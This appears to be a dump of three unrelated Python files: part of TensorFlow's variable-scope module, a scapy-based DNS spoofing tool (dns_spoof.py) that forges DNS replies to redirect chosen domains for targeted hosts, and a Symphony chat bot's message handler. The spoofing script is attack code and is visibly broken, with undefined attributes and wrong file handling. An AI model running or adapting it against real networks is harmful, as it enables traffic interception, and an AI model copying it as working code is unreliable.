constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value
(which must have the same shape). Constraints are not safe to
use when doing asynchronous distributed training.
"""
self._name_or_scope = name_or_scope
self._reuse = reuse
self._initializer = initializer
self._regularizer = regularizer
self._caching_device = caching_device
self._partitioner = partitioner
self._custom_getter = custom_getter
self._old_name_scope = old_name_scope
self._dtype = dtype
self._use_resource = use_resource
self._constraint = constraint
self._var_store = _get_default_variable_store()
self._var_scope_store = get_variable_scope_store()
if isinstance(self._name_or_scope, VariableScope):
self._new_name = self._name_or_scope.name
name_scope = self._name_or_scope._name_scope # pylint: disable=protected-access
# Handler for the case when we jump to a shared scope. We create a new
# VariableScope (self._var_scope_object) that contains a copy of the
# provided shared scope, possibly with changed reuse and initializer, if
# the user requested this.
variable_scope_object = VariableScope(
self._name_or_scope.reuse if not self._reuse else self._reuse,
name=self._new_name,
initializer=self._name_or_scope.initializer,
regularizer=self._name_or_scope.regularizer,
caching_device=self._name_or_scope.caching_device,
partitioner=self._name_or_scope.partitioner,
dtype=self._name_or_scope.dtype,
custom_getter=self._name_or_scope.custom_getter,
name_scope=name_scope,
use_resource=self._name_or_scope.use_resource,
constraint=self._constraint)
if self._initializer is not None:
variable_scope_object.set_initializer(self._initializer)
if self._regularizer is not None:
variable_scope_object.set_regularizer(self._regularizer)
if self._caching_device is not None:
variable_scope_object.set_caching_device(self._caching_device)
if self._partitioner is not None:
variable_scope_object.set_partitioner(self._partitioner)
if self._custom_getter is not None:
variable_scope_object.set_custom_getter(
_maybe_wrap_custom_getter(
self._custom_getter, self._name_or_scope.custom_getter))
if self._dtype is not None:
variable_scope_object.set_dtype(self._dtype)
if self._use_resource is not None:
variable_scope_object.set_use_resource(self._use_resource)
self._cached_variable_scope_object = variable_scope_object
def __enter__(self):
"""Begins the scope block.
Returns:
A VariableScope.
Raises:
ValueError: when trying to reuse within a create scope, or create within
a reuse scope, or if reuse is not `None` or `True`.
TypeError: when the types of some arguments are not appropriate.
"""
self._old = self._var_scope_store.current_scope
if isinstance(self._name_or_scope, VariableScope):
self._var_scope_store.open_variable_scope(self._new_name)
self._old_subscopes = copy.copy(
self._var_scope_store.variable_scopes_count)
variable_scope_object = self._cached_variable_scope_object
else:
# Handler for the case when we just prolong current variable scope.
# VariableScope with name extended by the provided one, and inherited
# reuse and initializer (except if the user provided values to set).
self._new_name = (
self._old.name + "/" + self._name_or_scope if self._old.name
else self._name_or_scope)
self._reuse = (self._reuse
or self._old.reuse) # Re-using is inherited by sub-scopes.
if self._old_name_scope is None:
name_scope = self._name_or_scope
else:
name_scope = self._old_name_scope
variable_scope_object = VariableScope(
self._reuse,
name=self._new_name,
initializer=self._old.initializer,
regularizer=self._old.regularizer,
caching_device=self._old.caching_device,
partitioner=self._old.partitioner,
dtype=self._old.dtype,
use_resource=self._old.use_resource,
custom_getter=self._old.custom_getter,
name_scope=name_scope,
constraint=self._constraint)
if self._initializer is not None:
variable_scope_object.set_initializer(self._initializer)
if self._regularizer is not None:
variable_scope_object.set_regularizer(self._regularizer)
if self._caching_device is not None:
variable_scope_object.set_caching_device(self._caching_device)
if self._partitioner is not None:
variable_scope_object.set_partitioner(self._partitioner)
if self._custom_getter is not None:
variable_scope_object.set_custom_getter(
_maybe_wrap_custom_getter(self._custom_getter,
self._old.custom_getter))
if self._dtype is not None:
variable_scope_object.set_dtype(self._dtype)
if self._use_resource is not None:
variable_scope_object.set_use_resource(self._use_resource)
self._var_scope_store.open_variable_scope(self._new_name)
self._var_scope_store.current_scope = variable_scope_object
return variable_scope_object
def __exit__(self, type_arg, value_arg, traceback_arg):
# If jumping out from a non-prolonged scope, restore counts.
if isinstance(self._name_or_scope, VariableScope):
self._var_scope_store.variable_scopes_count = self._old_subscopes
else:
self._var_scope_store.close_variable_subscopes(self._new_name)
self._var_scope_store.current_scope = self._old
def _maybe_wrap_custom_getter(custom_getter, old_getter):
"""Wrap a call to a custom_getter to use the old_getter internally."""
if old_getter is None:
return custom_getter
# The new custom_getter should call the old one
def wrapped_custom_getter(getter, *args, **kwargs):
# Call:
# custom_getter(
# lambda: old_getter(true_getter, ...), *args, **kwargs)
# which means custom_getter will call old_getter, which
# will call the true_getter, perform any intermediate
# processing, and return the results to the current
# getter, which will also perform additional processing.
return custom_getter(
functools.partial(old_getter, getter),
*args, **kwargs)
return wrapped_custom_getter
def _get_unique_variable_scope(prefix):
"""Get a name with the given prefix unique in the current variable scope."""
var_scope_store = get_variable_scope_store()
current_scope = get_variable_scope()
name = current_scope.name + "/" + prefix if current_scope.name else prefix
if var_scope_store.variable_scope_count(name) == 0:
return prefix
idx = 1
while var_scope_store.variable_scope_count(name + ("_%d" % idx)) > 0:
idx += 1
return prefix + ("_%d" % idx)
# Named like a function for backwards compatibility with the
# @tf_contextlib.contextmanager version, which was switched to a class to avoid
# some object creation overhead.
@tf_export(v1=["variable_scope"]) # pylint: disable=invalid-name
class variable_scope(object):
"""A context manager for defining ops that creates variables (layers).
This context manager validates that the (optional) `values` are from the same
graph, ensures that graph is the default graph, and pushes a name scope and a
variable scope.
If `name_or_scope` is not None, it is used as is. If `name_or_scope` is None,
then `default_name` is used. In that case, if the same name has been
previously used in the same scope, it will be made unique by appending `_N`
to it.
Variable scope allows you to create new variables and to share already created
ones while providing checks to not create or share by accident. For details,
see the [Variable Scope How To](https://tensorflow.org/guide/variables), here
we present only a few basic examples.
Simple example of how to create a new variable:
```python
with tf.variable_scope("foo"):
with tf.variable_scope("bar"):
v = tf.get_variable("v", [1])
assert v.name == "foo/bar/v:0"
```
Simple example of how to reenter a premade variable scope safely:
```python
with tf.variable_scope("foo") as vs:
pass
# Re-enter the variable scope.
with tf.variable_scope(vs,
auxiliary_name_scope=False) as vs1:
# Restore the original name_scope.
with tf.name_scope(vs1.original_name_scope):
v = tf.get_variable("v", [1])
assert v.name == "foo/v:0"
c = tf.constant([1], name="c")
assert c.name == "foo/c:0"
```
Basic example of sharing a variable AUTO_REUSE:
```python
def foo():
with tf.variable_scope("foo", reuse=tf.AUTO_REUSE):
v = tf.get_variable("v", [1])
return v
v1 = foo() # Creates v.
v2 = foo() # Gets the same, existing v.
assert v1 == v2
```
Basic example of sharing a variable with reuse=True:
```python
with tf.variable_scope("foo"):
v = tf.get_variable("v", [1])
with tf.variable_scope("foo", reuse=True):
v1 = tf.get_variable("v", [1])
assert v1 == v
```
Sharing a variable by capturing a scope and setting reuse:
```python
with tf.variable_scope("foo") as scope:
v = tf.get_variable("v", [1])
scope.reuse_variables()
v1 = tf.get_variable("v", [1])
assert v1 == v
```
To prevent accidental sharing of variables, we raise an exception when getting
an existing variable in a non-reusing scope.
```python
with tf.variable_scope("foo"):
v = tf.get_variable("v", [1])
v1 = tf.get_variable("v", [1])
# Raises ValueError("... v already exists ...").
```
Similarly, we raise an exception when trying to get a variable that does not
exist in reuse mode.
```python
with tf.variable_scope("foo", reuse=True):
v = tf.get_variable("v", [1])
# Raises ValueError("... v does not exists ...").
```
Note that the `reuse` flag is inherited: if we open a reusing scope, then all
its sub-scopes become reusing as well.
A note about name scoping: Setting `reuse` does not impact the naming of other
ops such as mult. See related discussion on
[github#6189](https://github.com/tensorflow/tensorflow/issues/6189)
Note that up to and including version 1.0, it was allowed (though explicitly
discouraged) to pass False to the reuse argument, yielding undocumented
behaviour slightly different from None. Starting at 1.1.0 passing None and
False as reuse has exactly the same effect.
A note about using variable scopes in multi-threaded environment: Variable
scopes are thread local, so one thread will not see another thread's current
scope. Also, when using `default_name`, unique scopes names are also generated
only on a per thread basis. If the same name was used within a different
thread, that doesn't prevent a new thread from creating the same scope.
However, the underlying variable store is shared across threads (within the
same graph). As such, if another thread tries to create a new variable with
the same name as a variable created by a previous thread, it will fail unless
reuse is True.
Further, each thread starts with an empty variable scope. So if you wish to
preserve name prefixes from a scope from the main thread, you should capture
the main thread's scope and re-enter it in each thread. For e.g.
```
main_thread_scope = variable_scope.get_variable_scope()
# Thread's target function:
def thread_target_fn(captured_scope):
with variable_scope.variable_scope(captured_scope):
# .... regular code for this thread
thread = threading.Thread(target=thread_target_fn, args=(main_thread_scope,))
```
"""
def __init__(self,
name_or_scope,
default_name=None,
values=None,
initializer=None,
regularizer=None,
caching_device=None,
partitioner=None,
custom_getter=None,
reuse=None,
dtype=None,
use_resource=None,
constraint=None,
auxiliary_name_scope=True):
"""Initialize the context manager.
Args:
name_or_scope: `string` or `VariableScope`: the scope to open.
default_name: The default name to use if the `name_or_scope` argument is
`None`, this name will be uniquified. If name_or_scope is provided it
won't be used and therefore it is not required and can be None.
values: The list of `Tensor` arguments that are passed to the op function.
initializer: default initializer for variables within this scope.
regularizer: default regularizer for variables within this scope.
caching_device: default caching device for variables within this scope.
partitioner: default partitioner for variables within this scope.
custom_getter: default custom getter for variables within this scope.
reuse: `True`, None, or tf.AUTO_REUSE; if `True`, we go into reuse mode
for this scope as well as all sub-scopes; if tf.AUTO_REUSE, we create
variables if they do not exist, and return them otherwise; if None, we
inherit the parent scope's reuse flag. When eager execution is enabled,
new variables are always created unless an EagerVariableStore or
template is currently active.
dtype: type of variables created in this scope (defaults to the type
in the passed scope, or inherited from parent scope).
use_resource: If False, all variables will be regular Variables. If True,
experimental ResourceVariables with well-defined semantics will be used
instead. Defaults to False (will later change to True). When eager
execution is enabled this argument is always forced to be True.
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value
(which must have the same shape). Constraints are not safe to
use when doing asynchronous distributed training.
auxiliary_name_scope: If `True`, we create an auxiliary name scope with
the scope. If `False`, we don't create it. Note that the argument is
not inherited, and it only takes effect for once when creating. You
should only use it for re-entering a premade variable scope.
Returns:
A scope that can be captured and reused.
Raises:
ValueError: when trying to reuse within a create scope, or create within
a reuse scope.
TypeError: when the types of some arguments are not appropriate.
"""
self._name_or_scope = name_or_scope
self._default_name = default_name
self._values = values
self._initializer = initializer
self._regularizer = regularizer
self._caching_device = caching_device
self._partitioner = partitioner
self._custom_getter = custom_getter
self._reuse = reuse
self._dtype = dtype
self._use_resource = use_resource
self._constraint = constraint
if self._default_name is None and self._name_or_scope is None:
raise TypeError("If default_name is None then name_or_scope is required")
if self._reuse is False:
# We don't allow non-inheriting scopes, False = None here.
self._reuse = None
if not (self._reuse is True
or self._reuse is None
or self._reuse is AUTO_REUSE):
raise ValueError("The reuse parameter must be True or False or None.")
if self._values is None:
self._values = []
self._in_graph_mode = not context.executing_eagerly()
if self._in_graph_mode:
self._graph = ops._get_graph_from_inputs(self._values) # pylint: disable=protected-access
self._cached_pure_variable_scope = None
self._current_name_scope = None
if not isinstance(auxiliary_name_scope, bool):
raise TypeError("The auxiliary_name_scope must be `True` or `False`, "
"while get {}".format(auxiliary_name_scope))
self._auxiliary_name_scope = auxiliary_name_scope
def __enter__(self):
# If the default graph is building a function, then we should not replace it
# with the cached graph.
if ops.get_default_graph().building_function:
self._building_function = True
else:
self._building_function = False
if self._in_graph_mode and not self._building_function:
self._graph_context_manager = self._graph.as_default()
self._graph_context_manager.__enter__()
if self._cached_pure_variable_scope is not None:
# Fast path for re-entering variable_scopes. We've held on to the pure
# variable scope from a previous successful __enter__, so we avoid some
# overhead by re-using that object.
if self._current_name_scope is not None:
self._current_name_scope.__enter__()
return self._cached_pure_variable_scope.__enter__()
try:
return self._enter_scope_uncached()
except:
if self._graph_context_manager is not None:
self._graph_context_manager.__exit__(*sys.exc_info())
raise
def _enter_scope_uncached(self):
"""Enters the context manager when there is no cached scope yet.
Returns:
The entered variable scope.
Raises:
TypeError: A wrong type is passed as `scope` at __init__().
ValueError: `reuse` is incorrectly set at __init__().
"""
if self._auxiliary_name_scope:
# Create a new name scope later
current_name_scope = None
else:
# Reenter the current name scope
name_scope = ops.get_name_scope()
if name_scope:
# Hack to reenter
name_scope += "/"
current_name_scope = ops.name_scope(name_scope)
else:
# Root scope
current_name_scope = ops.name_scope(name_scope)
# IMPORTANT: Only assign to self._cached_pure_variable_scope and
# self._current_name_scope after successful __enter__() calls.
if self._name_or_scope is not None:
if not isinstance(self._name_or_scope,
(VariableScope,) + six.string_types):
raise TypeError("VariableScope: name_or_scope must be a string or "
"VariableScope.")
if isinstance(self._name_or_scope, six.string_types):
name_scope = self._name_or_scope
else:
name_scope = self._name_or_scope.name.split("/")[-1]
if name_scope or current_name_scope:
current_name_scope = current_name_scope or ops.name_scope(name_scope)
try:
current_name_scope_name = current_name_scope.__enter__()
except:
current_name_scope.__exit__(*sys.exc_info())
raise
self._current_name_scope = current_name_scope
if isinstance(self._name_or_scope, six.string_types):
old_name_scope = current_name_scope_name
else:
old_name_scope = self._name_or_scope.original_name_scope
pure_variable_scope = _pure_variable_scope(
self._name_or_scope,
reuse=self._reuse,
initializer=self._initializer,
regularizer=self._regularizer,
caching_device=self._caching_device,
partitioner=self._partitioner,
custom_getter=self._custom_getter,
old_name_scope=old_name_scope,
dtype=self._dtype,
use_resource=self._use_resource,
constraint=self._constraint)
try:
entered_pure_variable_scope = pure_variable_scope.__enter__()
except:
pure_variable_scope.__exit__(*sys.exc_info())
raise
self._cached_pure_variable_scope = pure_variable_scope
return entered_pure_variable_scope
else:
self._current_name_scope = None
# This can only happen if someone is entering the root variable scope.
pure_variable_scope = _pure_variable_scope(
self._name_or_scope,
reuse=self._reuse,
initializer=self._initializer,
regularizer=self._regularizer,
caching_device=self._caching_device,
partitioner=self._partitioner,
custom_getter=self._custom_getter,
dtype=self._dtype,
use_resource=self._use_resource,
constraint=self._constraint)
try:
entered_pure_variable_scope = pure_variable_scope.__enter__()
except:
pure_variable_scope.__exit__(*sys.exc_info())
raise
self._cached_pure_variable_scope = pure_variable_scope
return entered_pure_variable_scope
else: # Here name_or_scope is None. Using default name, but made unique.
if self._reuse:
raise ValueError("reuse=True cannot be used without a name_or_scope")
current_name_scope = current_name_scope or ops.name_scope(
self._default_name)
try:
current_name_scope_name = current_name_scope.__enter__()
except:
current_name_scope.__exit__(*sys.exc_info())
raise
self._current_name_scope = current_name_scope
unique_default_name = _get_unique_variable_scope(self._default_name)
pure_variable_scope = _pure_variable_scope(
unique_default_name,
initializer=self._initializer,
regularizer=self._regularizer,
caching_device=self._caching_device,
partitioner=self._partitioner,
custom_getter=self._custom_getter,
old_name_scope=current_name_scope_name,
dtype=self._dtype,
use_resource=self._use_resource,
constraint=self._constraint)
try:
entered_pure_variable_scope = pure_variable_scope.__enter__()
except:
pure_variable_scope.__exit__(*sys.exc_info())
raise
self._cached_pure_variable_scope = pure_variable_scope
return entered_pure_variable_scope
def __exit__(self, type_arg, value_arg, traceback_arg):
self._cached_pure_variable_scope.__exit__(
type_arg, value_arg, traceback_arg)
if self._current_name_scope:
self._current_name_scope.__exit__(type_arg, value_arg, traceback_arg)
if self._in_graph_mode and not self._building_function:
self._graph_context_manager.__exit__(type_arg, value_arg, traceback_arg)
# pylint: disable=g-doc-return-or-yield
@tf_export(v1=["variable_op_scope"])
@tf_contextlib.contextmanager
def variable_op_scope(values,
name_or_scope,
default_name=None,
initializer=None,
regularizer=None,
caching_device=None,
partitioner=None,
custom_getter=None,
reuse=None,
dtype=None,
use_resource=None,
constraint=None):
"""Deprecated: context manager for defining an op that creates variables."""
logging.warn("tf.variable_op_scope(values, name, default_name) is deprecated,"
" use tf.variable_scope(name, default_name, values)")
with variable_scope(name_or_scope,
default_name=default_name,
values=values,
initializer=initializer,
regularizer=regularizer,
caching_device=caching_device,
partitioner=partitioner,
custom_getter=custom_getter,
reuse=reuse,
dtype=dtype,
use_resource=use_resource,
constraint=constraint) as scope:
yield scope
def _compute_slice_dim_and_shape(full_shape, slicing):
"""Computes which dimension is being sliced and the typical slice shape."""
slice_shape = [0] * len(full_shape)
slice_dim = None
for dim, num_slices in enumerate(slicing):
dim_size = full_shape[dim]
if num_slices <= 0 or dim_size < num_slices:
raise ValueError("Cannot create %d slices for size %d. shape: %s, "
"slicing: %s" %
(num_slices, full_shape[dim], full_shape, slicing))
if num_slices == 1:
# Not slicing in this dimension.
slice_shape[dim] = dim_size
elif slice_dim is not None:
# We only support slicing along one of the dimensions.
raise ValueError("Can only slice a variable along one dimension: "
"shape: %s, slicing: %s" % (full_shape, slicing))
else:
# Note: We will add any extras onto the last slice, later.
slice_dim = dim
slice_shape[dim] = dim_size // num_slices
# Degenerate case: If "slicing" was all ones, pretend we are slicing along
# the first dimension.
if slice_dim is None:
slice_dim = 0
return slice_dim, slice_shape
def _get_trainable_value(synchronization, trainable):
"""Computes the trainable value based on the given arguments."""
if synchronization == VariableSynchronization.ON_READ:
if trainable:
raise ValueError(
"Synchronization value can be set to "
"VariableSynchronization.ON_READ only for non-trainable variables. "
"You have specified trainable=True and "
"synchronization=VariableSynchronization.ON_READ.")
else:
# Set trainable to be false when variable is to be synced on read.
trainable = False
elif trainable is None:
trainable = True
return trainable
def default_variable_creator(next_creator=None, **kwargs):
"""Default variable creator."""
assert next_creator is None
initial_value = kwargs.get("initial_value", None)
trainable = kwargs.get("trainable", None)
collections = kwargs.get("collections", None)
validate_shape = kwargs.get("validate_shape", True)
caching_device = kwargs.get("caching_device", None)
name = kwargs.get("name", None)
variable_def = kwargs.get("variable_def", None)
dtype = kwargs.get("dtype", None)
expected_shape = kwargs.get("expected_shape", None)
import_scope = kwargs.get("import_scope", None)
constraint = kwargs.get("constraint", None)
use_resource = kwargs.get("use_resource", None)
# Set trainable value based on synchronization value.
synchronization = kwargs.get("synchronization", VariableSynchronization.AUTO)
trainable = _get_trainable_value(
synchronization=synchronization, trainable=trainable)
if use_resource is None:
use_resource = get_variable_scope().use_resource
if use_resource is None:
use_resource = _DEFAULT_USE_RESOURCE
use_resource = use_resource or context.executing_eagerly()
if use_resource:
return resource_variable_ops.ResourceVariable(
initial_value=initial_value, trainable=trainable,
collections=collections, validate_shape=validate_shape,
caching_device=caching_device, name=name, dtype=dtype,
constraint=constraint, variable_def=variable_def,
import_scope=import_scope)
else:
return variables.RefVariable(
initial_value=initial_value, trainable=trainable,
collections=collections, validate_shape=validate_shape,
caching_device=caching_device, name=name, dtype=dtype,
constraint=constraint, variable_def=variable_def,
expected_shape=expected_shape, import_scope=import_scope)
def default_variable_creator_v2(next_creator=None, **kwargs):
"""Default variable creator."""
assert next_creator is None
initial_value = kwargs.get("initial_value", None)
trainable = kwargs.get("trainable", None)
validate_shape = kwargs.get("validate_shape", True)
caching_device = kwargs.get("caching_device", None)
name = kwargs.get("name", None)
variable_def = kwargs.get("variable_def", None)
dtype = kwargs.get("dtype", None)
import_scope = kwargs.get("import_scope", None)
constraint = kwargs.get("constraint", None)
# Set trainable value based on synchronization value.
synchronization = kwargs.get("synchronization", VariableSynchronization.AUTO)
trainable = _get_trainable_value(
synchronization=synchronization, trainable=trainable)
return resource_variable_ops.ResourceVariable(
initial_value=initial_value, trainable=trainable,
validate_shape=validate_shape, caching_device=caching_device,
name=name, dtype=dtype, constraint=constraint, variable_def=variable_def,
import_scope=import_scope)
variables.default_variable_creator = default_variable_creator
variables.default_variable_creator_v2 = default_variable_creator_v2
def _make_getter(captured_getter, captured_previous):
"""Gets around capturing loop variables in python being broken."""
return lambda **kwargs: captured_getter(captured_previous, **kwargs)
# TODO(apassos) remove forwarding symbol
variable = variables.VariableV1
@tf_export(v1=["variable_creator_scope"])
@tf_contextlib.contextmanager
def variable_creator_scope_v1(variable_creator):
"""Scope which defines a variable creation function to be used by variable().
variable_creator is expected to be a function with the following signature:
```
def variable_creator(next_creator, **kwargs)
```
The creator is supposed to eventually call the next_creator to create a
variable if it does want to create a variable and not call Variable or
ResourceVariable directly. This helps make creators composable. A creator may
choose to create multiple variables, return already existing variables, or
simply register that a variable was created and defer to the next creators in
line. Creators can also modify the keyword arguments seen by the next
creators.
Custom getters in the variable scope will eventually resolve down to these
custom creators when they do create variables.
The valid keyword arguments in kwds are:
initial_value: A `Tensor`, or Python object convertible to a `Tensor`,
which is the initial value for the Variable. The initial value must have
a shape specified unless `validate_shape` is set to False. Can also be a
callable with no argument that returns the initial value when called. In
that case, `dtype` must be specified. (Note that initializer functions
from init_ops.py must first be bound to a shape before being used here.)
trainable: If `True`, the default, also adds the variable to the graph
collection `GraphKeys.TRAINABLE_VARIABLES`. This collection is used as
the default list of variables to use by the `Optimizer` classes.
`trainable` defaults to `True` unless `synchronization` is
set to `ON_READ`.
collections: List of graph collections keys. The new variable is added to
these collections. Defaults to `[GraphKeys.GLOBAL_VARIABLES]`.
validate_shape: If `False`, allows the variable to be initialized with a
value of unknown shape. If `True`, the default, the shape of
`initial_value` must be known.
caching_device: Optional device string describing where the Variable
should be cached for reading. Defaults to the Variable's device.
If not `None`, caches on another device. Typical use is to cache
on the device where the Ops using the Variable reside, to deduplicate
copying through `Switch` and other conditional statements.
name: Optional name for the variable. Defaults to `'Variable'` and gets
uniquified automatically.
dtype: If set, initial_value will be converted to the given type.
If `None`, either the datatype will be kept (if `initial_value` is
a Tensor), or `convert_to_tensor` will decide.
constraint: A constraint function to be applied to the variable after
updates by some algorithms.
use_resource: if True, a ResourceVariable is always created.
synchronization: Indicates when a distributed a variable will be
aggregated. Accepted values are constants defined in the class
`tf.VariableSynchronization`. By default the synchronization is set to
`AUTO` and the current `DistributionStrategy` chooses
when to synchronize. If `synchronization` is set to `ON_READ`,
`trainable` must not be set to `True`.
aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableAggregation`.
This set may grow over time, so it's important the signature of creators is as
mentioned above.
Args:
variable_creator: the passed creator
Yields:
A scope in which the creator is active
"""
with ops.get_default_graph()._variable_creator_scope(variable_creator): # pylint: disable=protected-access
yield
# Note: only the docstrings differ between this and v1.
@tf_export(v2=["variable_creator_scope"])
@tf_contextlib.contextmanager
def variable_creator_scope(variable_creator):
"""Scope which defines a variable creation function to be used by variable().
variable_creator is expected to be a function with the following signature:
```
def variable_creator(next_creator, **kwargs)
```
The creator is supposed to eventually call the next_creator to create a
variable if it does want to create a variable and not call Variable or
ResourceVariable directly. This helps make creators composable. A creator may
choose to create multiple variables, return already existing variables, or
simply register that a variable was created and defer to the next creators in
line. Creators can also modify the keyword arguments seen by the next
creators.
Custom getters in the variable scope will eventually resolve down to these
custom creators when they do create variables.
The valid keyword arguments in kwds are:
initial_value: A `Tensor`, or Python object convertible to a `Tensor`,
which is the initial value for the Variable. The initial value must have
a shape specified unless `validate_shape` is set to False. Can also be a
callable with no argument that returns the initial value when called. In
that case, `dtype` must be specified. (Note that initializer functions
from init_ops.py must first be bound to a shape before being used here.)
trainable: If `True`, the default, GradientTapes automatically watch
uses of this Variable.
validate_shape: If `False`, allows the variable to be initialized with a
value of unknown shape. If `True`, the default, the shape of
`initial_value` must be known.
caching_device: Optional device string describing where the Variable
should be cached for reading. Defaults to the Variable's device.
If not `None`, caches on another device. Typical use is to cache
on the device where the Ops using the Variable reside, to deduplicate
copying through `Switch` and other conditional statements.
name: Optional name for the variable. Defaults to `'Variable'` and gets
uniquified automatically.
dtype: If set, initial_value will be converted to the given type.
If `None`, either the datatype will be kept (if `initial_value` is
a Tensor), or `convert_to_tensor` will decide.
constraint: A constraint function to be applied to the variable after
updates by some algorithms.
synchronization: Indicates when a distributed a variable will be
aggregated. Accepted values are constants defined in the class
`tf.VariableSynchronization`. By default the synchronization is set to
`AUTO` and the current `DistributionStrategy` chooses
when to synchronize. If `synchronization` is set to `ON_READ`,
`trainable` must not be set to `True`.
aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableAggregation`.
This set may grow over time, so it's important the signature of creators is as
mentioned above.
Args:
variable_creator: the passed creator
Yields:
A scope in which the creator is active
"""
with ops.get_default_graph()._variable_creator_scope(variable_creator): # pylint: disable=protected-access
yield
|
dns_spoof.py
|
import os
from interface import Interface
from scapy.all import *
class DNSSpoof:
def __init__(self, interface, domain_file):
self.service = 'dnsmasq'
self.active = False
self.interface = Interface(interface, True)
self.interface.enable_sniff()
self.domain_file = domain_file
self.domains = list()
self.load_domains()
######################################################################################################################
###################################################### DNSMasq ######################################################
######################################################################################################################
def load_domains(self):
with open(self.domain_file, 'r') as f:
for line in f.read(): self.domains.append(line)
def start_dns(self):
os.system('service {} start'.format(self.service))
self.active = True
def stop_dns(self):
os.system('service {} stop'.format(self.service))
self.active = False
def restart_dns(self):
os.system('service {} restart'.format(self.service))
self.active = True
def exist_domain(self, domain):
with open(self.domain_file, 'r') as f:
for line in f.read():
if domain in line: return True
return False
def add_spoof_domain(self, domain):
if not self.exist_domain(domain):
with open(self.domain_file, 'a') as f:
line = '{Domain} {Server}'.format(Domain=self.domain, Server=self.server)
f.write(line)
return 'domain_added'
else:
return 'domain_exist'
def delete_spoof_domain(self, domain):
if self.exist_domain(domain):
with open(self.domain_file, 'rw') as f:
lines = f.read().split('\n')
lines.remove('{Domain} {Server}'.format(Domain=domain, Server=self.server))
f.write('\n'.join(lines))
######################################################################################################################
####################################################### SCAPY #######################################################
######################################################################################################################
def start(self):
self.sniff_thread = threading.Thread(target=self._sniff_packet)
self.sniff_thread.daemon = True
self.sniff_thread.start()
def send_spoofed_response(self, dest_ip, dest_port, domain):
response = DNSRR(rrname=domain.qname,ttl=1,rdata=self.ip)
send(IP(dst=dest_ip)/UDP(dport=dest_port)/DNS(qr=1,ar=response))
def _sniff_packet(self):
self.interface.enable_sniff()
sniff(prn=self._process_packet, iface=self.interface.get_monitor_interface_id(), stop_filter = lambda x: not self._should_continue, filter="dns.qry.type == 1", store=0)
def _process_packet(self, packet):
packet.show()
ip = packet.getlayer(IP)
udp = packet.getlayer(UDP)
if ip.src in self.targets:
dns = packet.getlayer(DNS)
if dns.query.name in self.domains:
self.send_spoofed_response(ip.src, udp.src_port, dns.qd)
|
message_processor.py
|
import re
import base64
import utils
import pandas as pd
from threading import Thread
from utils import log
from collections import Counter
from sym_api_client_python.clients.sym_bot_client import SymBotClient
from sym_api_client_python.processors.sym_message_parser import SymMessageParser
from .admin_processor import AdminProcessor
from .card_processor import CardProcessor
from bs4 import BeautifulSoup
class MessageProcessor:
def __init__(self, bot_client: SymBotClient):
self.bot_client = bot_client
self.message_client = self.bot_client.get_message_client()
self.message_parser = SymMessageParser()
self.admin_processor = AdminProcessor(self.bot_client)
self.card_processor = CardProcessor(self.bot_client)
self.help_message = 'Welcome to MI Flash Bot. Please use the following commands:<ul><li><b>/help</b>: show this message</li><li><b>/fundname [search query]</b>: search for funds by name</li><li><b>/isin [search query]</b>: search for funds by ISIN</li></ul>'
self.help_message_admin = 'Welcome to MI Flash Bot. Please use the following commands:<ul><li><b>/help</b>: show this message</li><li><b>/download</b>: get the active data file</li><li><b>/upload</b>: used together with an attached data file to replace the active data file</li><li><b>/blast [message]</b>: used together with an attached file containing 1 email address per line to blast IM messages</li><li><b>/logs</b>: get the bot activity log</li></ul>'
self.other_message = 'Hi there, welcome to the Managed Investments Bot.<br/>I am here to make your life easier. I can help you access quick information on funds covered by BOS.<br/><br/>To start, you can search by either of the following:<br/><b>(1) Search by Fund Name:</b> enter /fundname followed by name of the fund. Example: /fundname PIMCO GIS Income<br/><b>(2) Search by ISIN:</b> enter /ISIN followed by ISIN number of the fund. Example: /ISIN XS1234567<br/><br/>Let us start!'
def parse_message(self, msg):
msg_text = []
soup = BeautifulSoup(msg['message'], 'html.parser')
for i in soup.findAll(text=True):
msg_text.extend(i.split(' '))
stream_id = self.message_parser.get_stream_id(msg)
while (len(msg_text) > 0 and len(msg_text[0].strip()) == 0):
msg_text.pop(0)
command = msg_text[0].lower() if len(msg_text) > 0 else ''
rest_of_message = str.join(' ', msg_text[1:]) if len(msg_text) > 1 else ''
return stream_id, msg_text, command, rest_of_message
def get_attachment(self, stream_id, message_id, file_id):
attachment = self.message_client.get_msg_attachment(stream_id, message_id, file_id)
return base64.b64decode(attachment)
def processROOM(self, msg):
displayName = msg['user']['displayName']
stream_id, msg_text, command, rest_of_message = self.parse_message(msg)
if stream_id != utils.admin_stream_id:
log(f'Ignoring room message from non-admin stream {stream_id}')
return
log(f'Executing admin {command} query from {displayName}')
if command == '/help':
utils.send_message(stream_id, self.help_message_admin)
elif command == '/upload':
if 'attachments' not in msg or len(msg['attachments']) != 1:
utils.send_message(stream_id, 'Please attach data file along with /upload')
return
if not str(msg['attachments'][0]['name']).lower().endswith('.csv'):
utils.send_message(stream_id, 'Please attach a CSV data file')
return
self.admin_processor.send_data_file(stream_id)
attachment = self.get_attachment(stream_id, msg['messageId'], msg['attachments'][0]['id'])
self.admin_processor.replace_data_file(stream_id, attachment)
elif command == '/download':
self.admin_processor.send_data_file(stream_id)
elif command == '/logs':
self.admin_processor.send_log_file(stream_id)
elif command == '/blast':
if len(msg_text) < 2:
utils.send_message(stream_id, 'Please use /blast [message]')
return
if 'attachments' not in msg or len(msg['attachments']) != 1:
utils.send_message(stream_id, 'Please attach 1 file containing an email per line along with /blast')
return
log(f'Sending blast message: {rest_of_message}')
attachment = self.get_attachment(stream_id, msg['messageId'], msg['attachments'][0]['id'])
blast_thread = Thread(target = self.admin_processor.blast_messages, args = (attachment, rest_of_message))
blast_thread.start()
elif command.startswith('/'):
utils.send_message(stream_id, f'Sorry, I do not understand the command {command}')
def processIM(self, msg):
userId = msg['user']['userId']
displayName = msg['user']['displayName']
stream_id, msg_text, command, rest_of_message = self.parse_message(msg)
# Administrative commands
if command == '/help':
utils.send_message(stream_id, self.help_message)
elif command == '/clear':
utils.send_blanks(stream_id, 50)
# User performs an initial command search
elif (command == '/isin' or command == '/fundname') and len(rest_of_message) > 0:
log(f'Executing {command} query from {displayName} against {rest_of_message}')
if command == '/fundname':
data_field = 'Funds'
field_label = 'fund names'
else:
